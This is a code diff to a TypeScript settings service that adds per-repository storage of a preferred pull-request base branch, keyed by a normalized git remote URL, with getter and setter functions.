package/server/services/settings.ts CHANGED Viewed

@@ -26,6 +26,8 @@ export interface MstroSettings {
    * - Any other string is passed as --model <value>
    */
   model: string
+  /** Per-repo preferred PR base branch, keyed by normalized remote URL */
+  prBaseBranches?: Record<string, string>
 }
 const DEFAULT_SETTINGS: MstroSettings = {
@@ -87,3 +89,26 @@ export function setModel(model: string): void {
   settings.model = model
   saveSettings(settings)
 }
+/** Normalize a remote URL into a stable key (e.g. "github.com/owner/repo") */
+function normalizeRemoteUrl(remoteUrl: string): string {
+  return remoteUrl
+    .replace(/^(https?:\/\/|git@)/, '')
+    .replace(/\.git$/, '')
+    .replace(/:/, '/')
+}
+/** Get the preferred PR base branch for a repo */
+export function getPrBaseBranch(remoteUrl: string): string | null {
+  const settings = getSettings()
+  const key = normalizeRemoteUrl(remoteUrl)
+  return settings.prBaseBranches?.[key] ?? null
+}
+/** Save the preferred PR base branch for a repo */
+export function setPrBaseBranch(remoteUrl: string, branch: string): void {
+  const settings = getSettings()
+  if (!settings.prBaseBranches) settings.prBaseBranches = {}
+  settings.prBaseBranches[normalizeRemoteUrl(remoteUrl)] = branch
+  saveSettings(settings)
+}